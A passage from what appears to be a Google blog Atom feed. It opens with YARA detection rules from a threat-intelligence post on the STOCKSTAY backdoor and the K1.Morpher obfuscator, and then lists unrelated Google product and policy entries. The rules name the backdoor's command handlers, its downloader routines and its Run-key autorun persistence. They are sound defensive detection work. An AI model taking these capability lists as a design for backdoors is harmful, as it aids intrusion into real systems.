&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;rule G_Backdoor_STOCKSTAY_ConfigurationFile_2 {
    meta:
        author = "Google Threat Intelligence Group"
        description = "Detects encrypted configuration files associated with STOCKSTAY."
        hash = "40a3b969d81ef1ef35dd9ebcc6774e060b1b8949d3d74f38ca6b7d789c95cdb3"

    strings:
        $s1 = "\"SystemConfiguration\""
        $s2 = "An application for getting information about current events on trading platforms"
        $s3 = "To set the time for updating information, enter a value in minutes in the `Interval` field"
        $s4 = "The `SystemConfiguration` field stores the system settings of the application."
        $s5 = "In the `services` field, fill in the list of addresses of services that provide the `WebSocket protocol`."
        $s6 = "wss://"

    condition:
        uint16(0) == 0x227B  // {"
        and 4 of ($s*)
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;rule G_Backdoor_STOCKSTAY_ConfigurationFile_3 {
    meta:
        author = "Google Threat Intelligence Group"
        description = "Detects early configuration files associated with STOCKSTAY."
        hash = "1a2ca8b8e0344fe3d80da7352206a470245443e2349a237bc093df934ddc011f"

    strings:
        $key_required_1 = "\"List 1\""
        $key_required_2 = "\"List 2\""
        $key_required_3 = "\"List 3\""
        $key_dummy_1 = "\"BinanceApi\""
        $key_dummy_2 = "\"CoinbaseCloudApi\""
        $key_dummy_3 = "\"CoinbaseCloudApi Sandbox\""
        $key_dummy_4 = "\"ByBitApi Spot\""
        $key_dummy_5 = "\"ByBitApi Linear\""
        $key_dummy_6 = "\"Info level\""
        $key_dummy_7 = "\"Rate info\""
        $key_dummy_8 = "\"Info level\""

    condition:
        uint8(0) == 0x7B  // {
        and filesize &amp;gt; 500
        and all of ($key_required_*)
        and 3 of ($key_dummy*)
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;rule G_Backdoor_STOCKSTAY_ConfigurationFile_5 {
  meta:
    author = "Google Threat Intelligence Group"
    description = "Detects plaintext configuration files used by the STOCKSTAY malware family."
    hash = "6cee9e838792ac5e2098362d68ce93a9a2c095d476dc16b289fe8509c99b2b8b"

  strings:
    $internal_id_1 = "\"internal_id\""
    $internal_id_2 = "\"i_id\""
    $internal_key_1 = "\"internal_key\""
    $internal_key_2 = "\"i_k\""
    $interval_engine_1 = "\"interval_engine\""
    $interval_engine_2 = "\"ie\""
    $level_info_1 = "\"level_info\""
    $level_info_2 = "\"li\""
    $time_scale_1 = "\"time_scale\""
    $time_scale_2 = "\"ts\""
    $span_min_1 = "\"span_min\""
    $span_min_2 = "\"mx1\""
    $span_max_1 = "\"span_max\""
    $span_max_2 = "\"my1\""
    $rate_1 = "\"rate\""
    $rate_2 = "\"rt_x_y\""
    $rate_control_1 = "\"rate_control\""
    $service_1 = "\"service\""
    $service_2 = "\"srv\""
    $days_not_work_1 = "\"days_not_work\""
    $days_not_work_2 = "\"dnw\""
    $system_properties_1 = "\"system_properties\""
    $system_properties_2 = "\"sp\""

  condition:
    any of ($internal_id*)
    and any of ($internal_key*)
    and any of ($interval_engine*)
    and any of ($level_info*)
    and any of ($time_scale*)
    and any of ($span_min*)
    and any of ($span_max*)
    and any of ($rate*)
    and any of ($service*)
    and any of ($days_not_work*)
    and any of ($system_properties*)
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;rule G_Backdoor_STOCKSTAY_CryptoContainer_1 {
    meta:
        author = "Google Threat Intelligence Group"
        description = "Detects code for parsing crypto containers within STOCKSTAY components."
        hash = "82707cfdf24dcb762f4615f01e1ba4d3dfdec4abe9cd588558d2634d7e6a5eeb"

    strings:
        $s1 = "BuildCryptoContainer"
        $s2 = "ParseCryptoContainer"
        $s3 = "Windows-1251" wide
        $s4 = "AesCryptoServiceProvider"
        $s5 = "RSACryptoServiceProvider"

    condition:
        uint16(0) == 0x5a4d
        and all of them
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;rule G_Backdoor_STOCKSTAY_WindowNames_1 {
    meta:
        author = "Google Threat Intelligence Group"
        description = "Detects STOCKSTAY window names."
        hash = "dfd5cb91d06b9649d4cab500343af80ad1144a9e46641cc406f43dd169003c22"


    strings:
        $import = "_CorExeMain"
        $s2 = "SMEditorPage" wide
        $s3 = "SMNetPage" wide
        $s4 = "StockMarketViewPage" wide
        $s5 = "window_system32_x128" wide
        $s6 = "window_system32_x64" wide
        $s7 = "window_system32_x32" wide

    condition:
        $import 
        and any of ($s*)
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;rule G_Downloader_STOCKSTAY_MARKETMAKER_1 {
    meta:
        author = "Google Threat Intelligence Group"
        description = "Detects STOCKSTAY.MARKETMAKER downloader based on method names and payload filenames."
        hash = "da8a96bc74e265f945f1cc6992c6dc0f9ea36ed1991f7b8d312db79d9bf78c40"

    strings:
        $f1 = "CheckAutoRun"
        $f2 = "SetupAutoRun"
        $f3 = "DownloadAndExtractZip"
        $f4 = "GetSystemProxy"

        $s0 = "_CorExeMain"
        $s1 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" wide
        $s2 = "StockMarketView.exe" wide
        $s3 = "SMNet.exe" wide
        $s4 = "SMEditor.exe" wide

    condition:
        all of them
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;rule G_Controller_STOCKSTAY_STOCKMARKET_1 {
    meta:
        author = "Google Threat Intelligence Group"
        description = "Detects STOCKSTAY.STOCKMARKET controller based on method and field names, and SQL queries"
        hash = "2af7b513c05e76d7da5f75bb0a223c894a706c99ef2c2ddfe4eae542f95a08e0"

    strings:
        $f1 = "ProtocolMessageConnect"
        $f2 = "ProtocolMessageEnd"
        $f3 = "ProtocolMessagePing"
        $f4 = "ProtocolMessageRequestRecv"
        $f5 = "ProtocolMessageRequestSend"
        $f6 = "ProtocolMessageTask"
        $f7 = "ProtocolMessageTaskSysinfo"
        $f8 = "TMR_AppInit_Tick"
        $f9 = "TMR_Engine_Tick"
        $f10 = "TMR_KeepAlive_Tick"
        $f11 = "TMR_PingNet_Tick"
        $f12 = "TMR_PingSystem_Tick"
        $f13 = "GetDataTrade"
        $f14 = "GetDataNews"
        $f15 = "InsertDataTrade"
        $f16 = "InsertDataNews"
        $sql1 = "CREATE TABLE IF NOT EXISTS News (" wide
        $sql2 = "CREATE TABLE IF NOT EXISTS Trade (" wide
        $sql3 = "CREATE TABLE IF NOT EXISTS Market (" wide
        $sql4 = "INSERT INTO Market ( Guid, Version, Config, Status, Launch, Type ) VALUES (@Guid, @Version, @Config, @Status, @Launch, @Type)" wide
        $sql5 = "INSERT INTO News (Container) VALUES (@Container)" wide
        $sql6 = "INSERT INTO Trade (Container) VALUES (@Container)" wide

    condition:
        8 of ($f*)
        and any of ($sql*)
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;rule G_Tunneler_STOCKSTAY_STOCKBROKER_1 {
    meta:
        author = "Google Threat Intelligence Group"
        description = "Detects STOCKSTAY.STOCKBROKER tunneler based on known IPC message handler and variable names."
        hash = "dfd5cb91d06b9649d4cab500343af80ad1144a9e46641cc406f43dd169003c22"

    strings:
        $s1 = "_CorExeMain"
        $s2 = "ProtocolMessageStatusConnection"
        $s3 = "ProtocolMessageResult"
        $s4 = "ProtocolMessageEnd"
        $s5 = "OnGetDataFromServer"
        $s6 = "webSocket"
        $s7 = "wmCopyData"
        $s8 = "tempStorage"

    condition:
        all of them
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;rule G_Backdoor_STOCKSTAY_STOCKTRADER_3 {
    meta:
        author = "Google Threat Intelligence Group"
        description = "Detects STOCKSTAY.STOCKTRADER backdoor based on known command handlers and FNV1a hashes."
        hash = "82707cfdf24dcb762f4615f01e1ba4d3dfdec4abe9cd588558d2634d7e6a5eeb"

    strings:
        $cmd_1 = "AppDel"
        $cmd_3 = "AppDeleteRegistryValue"
        $cmd_4 = "AppDir"
        $cmd_5 = "AppGet"
        $cmd_6 = "AppMkdir"
        $cmd_7 = "AppPut"
        $cmd_8 = "AppReadRegistryValue"
        $cmd_9 = "AppRegistryKeyExists"
        $cmd_10 = "AppRmdir"
        $cmd_11 = "AppRun"
        $cmd_12 = "AppWriteRegistryValue"
        $cmd_13 = "AppUnpackArchive"
        $cmd_14 = "ArchiveFiles"
        $cmd_15 = "GetFiles"
        $cmd_16 = "Sysinfo"
        
        $hash_1  = {ea8e5e34}
        $hash_2  = {3445694e}
        $hash_3  = {f73e97b6}
        $hash_4  = {9aa70c59}
        $hash_5  = {18b496c9}
        $hash_6  = {0f716ebc}
        $hash_7  = {8e2d79ce}
        $hash_8  = {3ae2a963}
        $hash_9  = {35d26840}
        $hash_10 = {6c41d6bc}
        $hash_11 = {1fdbbb2f}
        $hash_12 = {6ae6578d}
        $hash_13 = {66732be7}
        $hash_14 = {0b113b3d}

    condition:
        uint16(0) == 0x5a4d
        and (
            12 of ($cmd*)
            or 10 of ($hash*)
        )
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;rule G_Hunting_K1MORPHER_1 {
  meta:
    author = "Google Threat Intelligence Group"
    description = "Detects plaintext class and method names associated with the .NET class K1.Morpher"
    hash = "45bb8d1ab2c13bf4354294e13d3c9be15de625d807301905b98462f43f93e893"

  strings:
    $plain_api_1 = "Squirrel3"
    $plain_api_2 = "DecryptArraySimple"
    $plain_api_3 = "DecryptIntSimple"
    $plain_api_4 = "DecryptLongSimple"
    $plain_api_5 = "DecryptFloatSimple"
    $plain_api_6 = "DecryptStringSimple"
    $plain_api_7 = "DecryptDoubleSimple"
    $plain_api_8 = "_squ_ui1"
    $plain_api_9 = "_squ_ui2"
    $plain_api_10 = "_squ_ui3"
    $plain_api_11 = "InjectedSeedCipher"

  condition:
    dotnet.is_dotnet
    and 5 of ($plain_api*)
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;rule G_Hunting_K1MORPHER_2 {
  meta:
    author = "Google Threat Intelligence Group"
    description = "Detects the Squirrel3 RNG implemented within K1.Morpher"
    hash = "45bb8d1ab2c13bf4354294e13d3c9be15de625d807301905b98462f43f93e893"

  strings:
    $squirrel3_code_1 = {
      00 // nop
      03 // ldarg.1
      0A // stloc.0
      06 // ldloc.0
      7E ??????04 // ldsfld &amp;lt;token&amp;gt;
      5A // mul
      0A // stloc.0
      06 // ldloc.0
      02 // ldarg.0
      58 // add
      0A // stloc.0
      06 // ldloc.0
      06 // ldloc.0
      1E // ldc.i4.8
      64 // shr.un
      61 // xor
      0A // stloc.0
      06 // ldloc.0
      7E ??????04 // ldsfld &amp;lt;token&amp;gt;
      58 // add
      0A // stloc.0
      06 // ldloc.0
      06 // ldloc.0
      1E // ldc.i4.8
      62 // shl
      61 // xor
      0A // stloc.0
      06 // ldloc.9
      7E ??????04 // ldsfld &amp;lt;token&amp;gt;
      5A // mul
      0A // stloc.0
      06 // ldloc.0
      06 // ldloc.0
      1E // ldc.i4.8
      64 // shr.un
      61 // xor
      0A // stloc.0
      06 // ldloc.0
      0B // stloc.1
      2B 00 // br.s 40
      07 // ldloc.1
      2A // ret
    }

  condition:
    dotnet.is_dotnet
    and all of them
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;rule G_Hunting_K1MORPHER_3 {
  meta:
    author = "Google Threat Intelligence Group"
    description = "Detects the Squirrel3 RNG implemented within K1.Morpher"
    hash = "391e51354118fb87dc57650cbbd94258c3f7c0a0d6868040b7a473ad626ff25e"

  strings:
    $squirrel3_code_1 = {
      03 // ldarg.1
      7E??????04 // ldsfld &amp;lt;token&amp;gt;
      5A // mul
      02 // ldarg.0
      58 // add
      25 // dup
      1E // ldc.i4.8
      64 // shr.un
      61 // xor
      7E??????04 // ldsfld &amp;lt;token&amp;gt;
      58 // add
      25 // dup
      1E // ldc.i4.8
      62 // shl
      61 // xor
      7E??????04 // ldsfld &amp;lt;token&amp;gt;
      5A // mul
      25 // dup
      1E // ldc.i4.8
      64 // shr.un
      61 // xor
      2A // ret
    }

  condition:
    dotnet.is_dotnet
    and all of them
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Acknowledgements&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This analysis would not have been possible without the assistance of Gabby Roncone for technical review. We also appreciate GitHub for their collaboration against this threat. &lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/threat-intelligence/stockstay-turla-intelligence-gathering/" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-25T14:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/intl/pl-pl/nowosci-firmie/rekordowe-zainteresowanie-narzedziami-ai-umiejetnosci-jutra-ai-az-94-absolwentow-zamierza-korzystac-z-ai-w-pracy/</id>
    <title>Rekordowe zainteresowanie narzędziami AI. Umiejętności Jutra: AI: aż 94% absolwentów zamierza korzystać z AI w pracy</title>
    <updated>2026-06-25T14:00:00+00:00</updated>
    <content type="html">Pełna sala absolwentów Umiejętności Jutra AI</content>
    <link href="https://blog.google/intl/pl-pl/nowosci-firmie/rekordowe-zainteresowanie-narzedziami-ai-umiejetnosci-jutra-ai-az-94-absolwentow-zamierza-korzystac-z-ai-w-pracy/" rel="alternate"/>
    <category term="Google Poland"/>
    <published>2026-06-25T14:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/devices/google-nest/gemini-home-voice-assistant-tips</id>
    <title>100 new ways to make your day easier with Gemini for Home voice assistant</title>
    <updated>2026-06-25T13:00:00+00:00</updated>
    <content type="html">A woman holds plates. A Google Nest is on her table.</content>
    <link href="https://blog.google/products-and-platforms/devices/google-nest/gemini-home-voice-assistant-tips" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-25T13:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/devices/google-nest/gemini-home-voice-assistant-tips/</id>
    <title>100 new ways to make your day easier with Gemini for Home voice assistant</title>
    <updated>2026-06-25T13:00:00+00:00</updated>
    <content type="html">A woman holds plates. A Google Nest is on her table.</content>
    <link href="https://blog.google/products-and-platforms/devices/google-nest/gemini-home-voice-assistant-tips/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-25T13:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/company-news/inside-google/around-the-globe/google-europe/united-kingdom/google-play-updates-uk-developers</id>
    <title>Google Play updates let U.K. developers do more and pay less.</title>
    <updated>2026-06-25T11:00:00+00:00</updated>
    <content type="html">We’re pleased to share that the UK will be one of the first markets to benefit from updates to Google Play’s business model, bringing lower fees and more choice to devel…</content>
    <link href="https://blog.google/company-news/inside-google/around-the-globe/google-europe/united-kingdom/google-play-updates-uk-developers" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-25T11:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/company-news/inside-google/around-the-globe/google-europe/united-kingdom/google-play-updates-uk-developers/</id>
    <title>Google Play updates let U.K. developers do more and pay less.</title>
    <updated>2026-06-25T11:00:00+00:00</updated>
    <content type="html">We’re pleased to share that the UK will be one of the first markets to benefit from updates to Google Play’s business model, bringing lower fees and more choice to devel…</content>
    <link href="https://blog.google/company-news/inside-google/around-the-globe/google-europe/united-kingdom/google-play-updates-uk-developers/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-25T11:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://research.google/blog/optimizing-cloud-economics-with-linear-elastic-caching</id>
    <title>Optimizing cloud economics with linear elastic caching</title>
    <updated>2026-06-25T10:03:00+00:00</updated>
    <content type="html">Algorithms &amp; Theory</content>
    <link href="https://research.google/blog/optimizing-cloud-economics-with-linear-elastic-caching" rel="alternate"/>
    <category term="Google Research"/>
    <published>2026-06-25T10:03:00+00:00</published>
  </entry>
  <entry>
    <id>https://research.google/blog/optimizing-cloud-economics-with-linear-elastic-caching/</id>
    <title>Optimizing cloud economics with linear elastic caching</title>
    <updated>2026-06-25T10:03:00+00:00</updated>
    <content type="html">Algorithms &amp; Theory</content>
    <link href="https://research.google/blog/optimizing-cloud-economics-with-linear-elastic-caching/" rel="alternate"/>
    <category term="Google Research"/>
    <published>2026-06-25T10:03:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/company-news/outreach-and-initiatives/public-policy/white-paper-ai-regulation</id>
    <title>Read our white paper on a pragmatic approach to AI governance in America.</title>
    <updated>2026-06-25T09:00:00+00:00</updated>
    <content type="html">&lt;img src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/GoogleG-Gradient-Hero.max-600x600.format-webp.webp" /&gt;The debate over AI governance is stuck in a false choice between over-regulation and no regulation. There is a middle way: A pragmatic, evidence-based approach that reco…</content>
    <link href="https://blog.google/company-news/outreach-and-initiatives/public-policy/white-paper-ai-regulation" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-25T09:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/products/education/iste-students-2026</id>
    <title>Supporting students with connected AI tools for more personalized learning</title>
    <updated>2026-06-25T09:00:00+00:00</updated>
    <content type="html">A digital graphic collage on a clean white background with faint grey grid lines. In the center foreground sits a large, Google Gemini logo in vibrant red, blue, green, and</content>
    <link href="https://blog.google/products-and-platforms/products/education/iste-students-2026" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-25T09:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/products/education/iste-students-2026/</id>
    <title>Supporting students with connected AI tools for more personalized learning</title>
    <updated>2026-06-25T09:00:00+00:00</updated>
    <content type="html">A digital graphic collage on a clean white background with faint grey grid lines. In the center foreground sits a large, Google Gemini logo in vibrant red, blue, green, and</content>
    <link href="https://blog.google/products-and-platforms/products/education/iste-students-2026/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-25T09:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/company-news/outreach-and-initiatives/public-policy/white-paper-ai-regulation/</id>
    <title>Read our white paper on a pragmatic approach to AI governance in America.</title>
    <updated>2026-06-25T09:00:00+00:00</updated>
    <content type="html">&lt;img src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/GoogleG-Gradient-Hero.max-600x600.format-webp.webp" /&gt;The debate over AI governance is stuck in a false choice between over-regulation and no regulation. There is a middle way: A pragmatic, evidence-based approach that reco…</content>
    <link href="https://blog.google/company-news/outreach-and-initiatives/public-policy/white-paper-ai-regulation/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-25T09:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://docs.cloud.google.com/release-notes#June_25_2026</id>
    <title>Cloud Release Notes — June 25, 2026</title>
    <updated>2026-06-25T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;BigQuery&lt;/h2&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;An updated version of the
&lt;a href="https://docs.cloud.google.com/bigquery/docs/reference/odbc-jdbc-drivers#current_odbc_driver"&gt;Simba ODBC driver for BigQuery&lt;/a&gt;
is now available.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Oracle Database@Google Cloud&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;You can view the details of your GoldenGate deployments, connections, and related assignments through Google Cloud console. For more information, see &lt;a href="https://docs.cloud.google.com/oracle/database/docs/manage-deployments"&gt;Manage deployments&lt;/a&gt;, &lt;a href="https://docs.cloud.google.com/oracle/database/docs/manage-connections"&gt;Manage connections&lt;/a&gt;, and &lt;a href="https://docs.cloud.google.com/oracle/database/docs/manage-assignments"&gt;Manage assignments&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This feature is &lt;a href="https://cloud.google.com/products#product-launch-stages"&gt;Generally Available (GA)&lt;/a&gt;.&lt;/p&gt;</content>
    <link href="https://docs.cloud.google.com/release-notes#June_25_2026" rel="alternate"/>
    <category term="Cloud Release Notes"/>
    <published>2026-06-25T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/06/stricter-classifications-for-google-groups-to-enhance-data-security-and-privacy.html</id>
    <title>Stricter classifications for Google Groups to enhance data security and privacy</title>
    <updated>2026-06-24T21:22:05+00:00</updated>
    <content type="html">Earlier this year, we &lt;a href="https://workspaceupdates.googleblog.com/2026/02/new-internal-and-external-membership-classifications.html" target="_blank"&gt;announced&lt;/a&gt; changes to Google Groups to enhance data security and privacy. The changes, which are rolling out now, include:&lt;div&gt;&lt;br /&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Stricter “internal” and “external” classifications for Groups&lt;/li&gt;&lt;li&gt;Clearer visual indicators for whether a group contains external members&lt;/li&gt;&lt;li&gt;Changes to how emails are shown within Google Groups&lt;/li&gt;&lt;li&gt;Additional settings granularity to control  who can add external users (admins only, or admins and end users)&amp;nbsp;&lt;/li&gt;&lt;li&gt;Changes to how admins can add external users via Groups APIs&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;API changes&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;While we originally announced that admins would have to change the classification of a group before being able to add external members to Groups marked as internal, we’re updating that behavior to prevent issues with synced groups. When an admin attempts to add an external member to an internal group via the Cloud Identity or Admin SDK Directory API, or when they sync data from a third-party identity provider via API, the group settings will be automatically updated to allow admins to add external members.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins:&lt;/b&gt; To ensure a smooth transition, existing groups will be automatically classified based on their current membership, so there will not be any changes in access. You can &lt;a href="https://knowledge.workspace.google.com/admin/groups/view-a-groups-members" target="_blank"&gt;review and adjust these labels&lt;/a&gt; directly in the Admin console or via the Groups Settings API to match your organization's security needs.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;There is no action required for end users.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains:&lt;/a&gt; Rolling out now, with expected completion by July 1, 2026&amp;nbsp;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Available to all Google Workspace customers&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://knowledge.workspace.google.com/admin/groups/changes-to-internal-and-external-classifications-in-google-groups?visit_id=639161942651030020-289600053&amp;amp;rd=1" target="_blank"&gt;Changes to internal and external classifications in Google Groups&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/div&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/06/stricter-classifications-for-google-groups-to-enhance-data-security-and-privacy.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-24T21:22:05+00:00</published>
  </entry>
  <entry>
    <id>http://workspaceupdates.googleblog.com/2026/06/stricter-classifications-for-google-groups-to-enhance-data-security-and-privacy.html</id>
    <title>Stricter classifications for Google Groups to enhance data security and privacy</title>
    <updated>2026-06-24T21:22:05+00:00</updated>
    <content type="html">Earlier this year, we &lt;a href="https://workspaceupdates.googleblog.com/2026/02/new-internal-and-external-membership-classifications.html" target="_blank"&gt;announced&lt;/a&gt; changes to Google Groups to enhance data security and privacy. The changes, which are rolling out now, include:&lt;div&gt;&lt;br /&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Stricter “internal” and “external” classifications for Groups&lt;/li&gt;&lt;li&gt;Clearer visual indicators for whether a group contains external members&lt;/li&gt;&lt;li&gt;Changes to how emails are shown within Google Groups&lt;/li&gt;&lt;li&gt;Additional settings granularity to control  who can add external users (admins only, or admins and end users)&amp;nbsp;&lt;/li&gt;&lt;li&gt;Changes to how admins can add external users via Groups APIs&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;API changes&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;While we originally announced that admins would have to change the classification of a group before being able to add external members to Groups marked as internal, we’re updating that behavior to prevent issues with synced groups. When an admin attempts to add an external member to an internal group via the Cloud Identity or Admin SDK Directory API, or when they sync data from a third-party identity provider via API, the group settings will be automatically updated to allow admins to add external members.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins:&lt;/b&gt; To ensure a smooth transition, existing groups will be automatically classified based on their current membership, so there will not be any changes in access. You can &lt;a href="https://knowledge.workspace.google.com/admin/groups/view-a-groups-members" target="_blank"&gt;review and adjust these labels&lt;/a&gt; directly in the Admin console or via the Groups Settings API to match your organization's security needs.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;There is no action required for end users.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains:&lt;/a&gt; Rolling out now, with expected completion by July 1, 2026&amp;nbsp;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Available to all Google Workspace customers&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://knowledge.workspace.google.com/admin/groups/changes-to-internal-and-external-classifications-in-google-groups?visit_id=639161942651030020-289600053&amp;amp;rd=1" target="_blank"&gt;Changes to internal and external classifications in Google Groups&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/div&gt;</content>
    <link href="http://workspaceupdates.googleblog.com/2026/06/stricter-classifications-for-google-groups-to-enhance-data-security-and-privacy.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-24T21:22:05+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/06/updates-to-gemini-in-google-classroom.html</id>
    <title>Updates to Gemini in Google Classroom</title>
    <updated>2026-06-24T20:48:48+00:00</updated>
    <content type="html">We are introducing several updates to the Gemini tab in Google Classroom designed to make its tools even more helpful for teachers. These changes make it easier for educators to collaborate with AI and create visual aids from any device, while expanding options for refining lesson plans.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Mobile availability&lt;/b&gt;&lt;/div&gt;&lt;div&gt;We know educators and students use Google Classroom on the go on their mobile devices, so we are excited to announce that the Gemini tab is now available in the Classroom Android and iOS apps, making these features more accessible to teachers and higher education students. For educators, the following features are available in the Classroom mobile app: Generate a quiz, Brainstorm project ideas, Craft a compelling hook, Tackle common misconceptions, and starter prompts for the Gemini app. All Gemini starter prompts and personal class notebooks in the student Gemini tab are available in the Classroom mobile app.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Tools to generate visual resources&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Powered by Nano Banana 2, Google’s newest image generation model, these starter prompts help teachers create visuals that illustrate complex topics for students:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Create an infographic&lt;/li&gt;&lt;li&gt;Draw a comic strip&lt;/li&gt;&lt;li&gt;Visualize a 